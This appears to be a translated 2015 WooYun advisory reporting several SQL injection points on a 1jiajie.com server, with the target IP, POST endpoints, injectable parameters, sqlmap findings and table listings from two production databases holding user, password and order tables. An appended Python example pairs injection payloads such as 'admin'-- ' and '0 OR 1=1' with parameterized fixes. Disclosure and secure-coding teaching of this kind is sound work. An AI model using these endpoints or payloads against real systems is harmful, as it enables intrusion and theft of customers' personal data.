
Vulnerability Summary (followers: 24)

Defect ID: wooyun-2015-0147507

Title: Multiple SQL injection vulnerabilities on an E家洁 site (15 databases, about 400,000 user records)

Vendor: 1jiajie.com

Author: 路人甲

Submitted: 2015-10-19 09:52

Fix time: 2015-10-24 09:54

Published: 2015-10-24 09:54

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-10-19: Details sent to the vendor, awaiting vendor action
2015-10-24: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Multiple injection points, covering 15 databases, 400,000+ user records and several million order records!~~~

Detailed description:

Multiple SQL injection vulnerabilities on an E家洁 site (15 databases + 400,000 user records)
1. Injection point one

http://123.57.231.146:808/index.php?action=login&do=auth (POST)
username=admin&password=123456&user_id=345&user_name=admin&user_phone=13333333333


The username parameter is injectable. I only found this address after reading the expert's earlier report!~~~ It still has not been fixed.

[Screenshot: 1.jpg]


WooYun: E家洁某站点SQL注入漏洞(涉及15个库40万用户信息) (the earlier report: SQL injection on an E家洁 site, 15 databases / 400,000 user records)
See the expert's report for the actual data!~~~
2. Injection point two

http://123.57.231.146:808/index.php?action=login&do=getUserInfo (POST)
user_name=admin


The user_name parameter is injectable.
See the Burp Suite test:

[Screenshot: 2.jpg]


[Screenshot: 3.jpg]


Running sqlmap:
With no extra options, sqlmap reports a time-based blind injection.

[Screenshot: 4.jpg]


With --level 3 added, the injection it finds is different!~~~

[Screenshot: 5.jpg]


[Screenshot: 6.jpg]


Database: sq_ejiajie
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| push_msg_queue | 2340536 |
| promo_code_type | 1358320 |
| driver_login_record | 1037306 |
| b_wx_url_record | 994851 |
| attendance_log | 806808 |
| promo_code_record | 724470 |
| user_request_order_log | 675203 |
| user_visit_record | 625581 |
| driver_call_record | 613764 |
| user_request_order | 577845 |
| user_money_record_log | 536889 |
| push_message_info | 482235 |
| user_password | 416681 |
| user_request_order_ext | 300483 |
| mobile_number | 288731 |
| user_comment_relation | 267405 |
| company_stock_goods_info | 266178 |
| user_money_record | 261989 |
| b_wx_qr_code_record | 224111 |
| mobile | 208995 |
| b_wx_promo_code_record | 205251 |
| broadcast | 202809 |
| user_money_relation | 170712 |
| da_order | 152061 |
| driver_order_push | 147983 |
| driver_call_record_now | 127274 |
| user_charge_reward_record | 100515 |
| user_address_info | 95623 |
| all_user_finger | 95512 |
| user_money_relation_log | 91544 |
| b_wx_point_like_zan | 86497 |
| table_ceshi | 65535 |
| all_user_info | 64098 |
| driver_busy_time | 54932 |
| user_charge_record | 43783 |
| user_call_record | 36746 |
| shop_data_stats | 34233 |
| shop_daily_pod_stats | 34116 |
| user_free_code | 30329 |
| driver_pay_record | 28000 |
| shop_daily_ine_stats | 27969 |
| shop_daily_ine_stats_detail | 27969 |
| da_driver_order | 25785 |
| weibo_feed_relation | 23115 |
| promo_code_name | 22558 |
| ejiajie_push_record | 21505 |
| user_request_order_temp | 20330 |
| promote_access_record | 18069 |
| shop_expense_record | 16421 |
| driver_info | 14105 |
| driver_password | 14024 |
| new_customer_report | 13570 |
| driver_state_relation | 11841 |
| user_request_card | 10777 |
| driver_month_rank | 10673 |
| complain_order_relation | 10183 |
| da_driver | 9414 |
| driver_modification | 8938 |
| driver_info_copy | 8072 |
| driver_week_rank | 8058 |
| black_log | 8028 |
| driver_week_star | 6913 |
| da_order_type | 6673 |
| user_password_bak_3 | 6362 |
| user_high_intention | 5877 |
| user_password_bak | 5560 |
| da_mobile_scan | 5065 |
| project_number_total | 5043 |
| driver_visit_record | 4132 |
| company_shop_consuming_record | 4105 |
| da_user_dau | 4002 |
| user_comment_relation_xxoo | 3758 |
| user_problem_report | 3716 |
| da_driver_dau | 3610 |
| activity_column_data | 3396 |
| da_user_dnu | 3356 |
| da_day_data | 3280 |
| collect_driver_relation | 3087 |
| a | 2966 |
| user_phone_info | 2777 |
| b_weixin_order_temp | 2459 |
| user_want_service | 2300 |
| user_charge_back_record | 2097 |
| user_request_order_gaode | 2064 |
| driver_info_temp_2 | 2051 |
| driver_call_record_temp | 1980 |
| channle_record | 1958 |
| driver_address_record | 1952 |
| company_stock_record | 1423 |
| driver_info_other | 1337 |
| driver_charge_record | 1278 |
| driver_punish_record | 1200 |
| car_info | 1079 |
| invoiced_record | 1055 |
| user_password_bak_2 | 802 |
| shop_money_record | 517 |
| driver_cancel | 494 |
| driver_on_line | 482 |
| user_pay_calls | 425 |
| jc_admin_user | 417 |
| recharge_telephone_log | 411 |
| driver_call_record_temp2 | 376 |
| user_deals_info | 365 |
| user_invite_record | 356 |
| user_comment_record | 300 |
| shop_info | 298 |
| user_call_count | 290 |
| add_phone | 221 |
| exchange_info | 211 |
| company_property_record | 188 |
| company_stock_goods | 179 |
| recharge_telephone | 179 |
| driver_info_card | 178 |
| driver_train_record | 178 |
| gaode_call_order | 149 |
| plan_task | 129 |
| tmp_calc | 120 |
| driver_info_upgrade | 110 |
| company_property_goods | 101 |
| special_user | 100 |
| user_charge_reward | 97 |
| b_wx_qr_code | 94 |
| taobao_order_stats | 93 |
| statistics_tab | 87 |
| user_request_order_modify | 79 |
| da_scan_type | 75 |
| driver_punish_reason_detail | 61 |
| monthly_service_info | 40 |
| duiba_goods_record | 25 |
| system_announcement | 24 |
| company_store_house | 23 |
| user_tele_info | 23 |
| channel_type | 22 |
| driver_reason_two_type | 22 |
| market_info | 21 |
| company_stock_deploy_record | 19 |
| activity_column_list | 18 |
| auntday | 14 |
| shop_daily_ine_remark | 14 |
| driver_recyclephone | 12 |
| recover | 12 |
| broadcast_category | 11 |
| company_property_supplier | 11 |
| user_prize | 11 |
| user_recommen_driver | 11 |
| monthly_settlement | 10 |
| order_type | 10 |
| driver_report_order | 8 |
| order_server_log | 7 |
| reset_score_record | 7 |
| test_test | 7 |
| all_city_info | 6 |
| user_deals_style_branch | 6 |
| bank_info | 5 |
| card_sell_record | 5 |
| driver_complain | 5 |
| driver_punish_reason_type | 5 |
| company_property_goods_type_list | 4 |
| ivr_iphone_broad_cast_info | 4 |
| user_notice_relation | 4 |
| b_wx_send_record | 3 |
| service_info | 3 |
| b_wx_point_like_type | 2 |
| driver_highintent_info | 2 |
| driver_report_insurance | 2 |
| ivr_broad_cast_info | 2 |
| coupon_activity_list | 1 |
| coupon_code_list | 1 |
| coupon_type_list | 1 |
| duducar_admin | 1 |
| fangzhongjie_info | 1 |
| fangzhongjie_user_relation | 1 |
| jia_duanxin | 1 |
+----------------------------------+---------+
Database: sq_ejiajie_v2
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| order_status | 3452654 |
| user_order | 2355576 |
| admin_proc_log | 2186611 |
| order_worker | 1994975 |
| worker_login_log | 1442334 |
| auto_assign_log | 1285166 |
| user_info | 745351 |
| transaction_record | 743486 |
| user_address | 544835 |
| clean_order | 542985 |
| user_info_old | 520351 |
| order_pay | 519129 |
| worker_parttime_busy_time | 298318 |
| user_comment | 275997 |
| company_stock_goods_info | 266180 |
| agency_pay_record | 151539 |
| send_msg_log | 144701 |
| user_order_process | 126436 |
| driver_busy_time | 55582 |
| user_charge_record | 33746 |
| order_hidden_worker | 27345 |
| worker_block | 20023 |
| pop_order | 16423 |
| worker_info | 15517 |
| worker_pay_record | 11316 |
| complain_order | 6161 |
| recharge_card_record | 5982 |
| worker_holiday | 5450 |
| company_shop_consuming_record | 5082 |
| pop_checkin_record | 3019 |
| order_rule | 2387 |
| company_stock_record | 1425 |
| invoiced_record | 1374 |
| admin_group_priv | 1173 |
| baidu_order | 1087 |
| pop_daily_checkin | 1080 |
| jc_admin_user | 829 |
| user_block_worker | 738 |
| role_change_record | 537 |
| pop_notify | 308 |
| agency_info | 249 |
| company_stock_goods | 179 |
| company_property_goods | 101 |
| coordinate | 82 |
| agency_group_priv | 67 |
| monthly_rule | 57 |
| shop_info | 55 |
| worker_insurance | 43 |
| jc_admin_group | 29 |
| ordersrc | 29 |
| wash_deliver | 29 |
| company_store_house | 23 |
| company_stock_deploy_record | 19 |
| period_order | 18 |
| visit_record | 15 |
| company_property_supplier | 11 |
| app_update_info | 6 |
| recharge_card_rule | 5 |
| company_property_goods_type_list | 4 |
| agency_group | 3 |
+----------------------------------+---------+


[Screenshot: 7.jpg]


3. Injection point three

http://123.57.231.146:808/index.php?action=login&do=sendPwdToPhone (POST)
id=345&username=admin&telephone=13333333333


Both id and username are injectable, and again differently from injection point one.
Burp Suite test:

[Screenshot: 8.jpg]


[Screenshot: 9.jpg]


sqlmap test:

[Screenshot: 10.jpg]


[Screenshot: 11.jpg]


4. Obtaining user phone numbers without injection
Tested with the top 500 users

[Screenshot: 12.jpg]


[Screenshot: 13.jpg]

Proof of vulnerability:

As above

Remediation:

You know what to do!~~~
Any gifts?
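The remediation section leaves the fix implicit. As an added example (not code from the report, from WooYun, or from 1jiajie.com), the block below shows the two query shapes that produce the kinds of injection the report lists, a quoted string parameter like username/user_name and an unquoted numeric parameter like id, beside the same queries written with placeholders. The real index.php handler is not public, so the table name, column names and query shapes are assumptions; sqlite3 stands in for MySQL so the file runs offline (sqlite3 has no SLEEP(), so the time-based probe sqlmap reported is not reproduced; the quote-breaking and numeric-context cases are). The sample rows are constructed for the example.

```python
import sqlite3

# Constructed sample rows (not data from the site); columns mirror the
# parameter names in the report's POST bodies.
ROWS = [
    (345, "admin", "s3cret", "13333333333"),
    (346, "alice", "hunter2", "13800000001"),
]


def make_db() -> sqlite3.Connection:
    """In-memory sqlite3 database standing in for the MySQL backend (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user_info (user_id INTEGER, user_name TEXT, "
        "password TEXT, user_phone TEXT)"
    )
    conn.executemany("INSERT INTO user_info VALUES (?, ?, ?, ?)", ROWS)
    return conn


# --- Vulnerable shape: request values spliced into the SQL text ------------

def auth_vulnerable(conn, username, password):
    # String context: a single quote in `username` closes the literal, and a
    # `--` comment discards the password check that follows it.
    sql = (
        "SELECT user_id, user_name FROM user_info "
        f"WHERE user_name = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()


def lookup_by_id_vulnerable(conn, user_id):
    # Numeric context: the value is unquoted, so no quote is needed to break
    # out; an OR clause makes the predicate true for every row.
    sql = f"SELECT user_name, user_phone FROM user_info WHERE user_id = {user_id}"
    return conn.execute(sql).fetchall()


# --- Fixed shape: placeholders, values handed to the driver separately -----

def auth_fixed(conn, username, password):
    sql = (
        "SELECT user_id, user_name FROM user_info "
        "WHERE user_name = ? AND password = ?"
    )
    return conn.execute(sql, (username, password)).fetchall()


def lookup_by_id_fixed(conn, user_id):
    # Type-check at the boundary as well: anything that is not an integer is
    # rejected before it reaches the database.
    if not str(user_id).isdigit():
        raise ValueError("user_id must be a non-negative integer")
    sql = "SELECT user_name, user_phone FROM user_info WHERE user_id = ?"
    return conn.execute(sql, (int(user_id),)).fetchall()


def demo():
    """Run each payload against both shapes and return the outcomes."""
    conn = make_db()
    quote_payload = "admin'-- "      # aimed at the quoted string parameter
    numeric_payload = "0 OR 1=1"     # aimed at the unquoted numeric parameter
    try:
        lookup_by_id_fixed(conn, numeric_payload)
        fixed_id_rejected = False
    except ValueError:
        fixed_id_rejected = True
    return {
        # vulnerable: authenticates as admin with no valid password
        "vuln_auth": auth_vulnerable(conn, quote_payload, "wrong"),
        # fixed: the payload is compared as a literal user name, so no match
        "fixed_auth": auth_fixed(conn, quote_payload, "wrong"),
        # vulnerable: returns every user's phone number
        "vuln_id": lookup_by_id_vulnerable(conn, numeric_payload),
        # fixed: rejected before any query runs
        "fixed_id_rejected": fixed_id_rejected,
        # fixed with a legitimate id still works
        "fixed_id_ok": lookup_by_id_fixed(conn, "345"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Run the file to see each outcome side by side. The fixed functions rely on the driver's placeholder mechanism, which keeps query text and data apart; with PHP and MySQL the same separation comes from PDO prepared statements (prepare/bindValue) or mysqli_stmt::bind_param, and the integer check on id belongs in the handler regardless of which driver is used.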

Copyright notice: when reposting, credit the source: 路人甲@WooYun


Vendor Response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-10-24 09:54

Vendor reply:

Vulnerability Rank: 15 (WooYun assessment)

Latest status:

None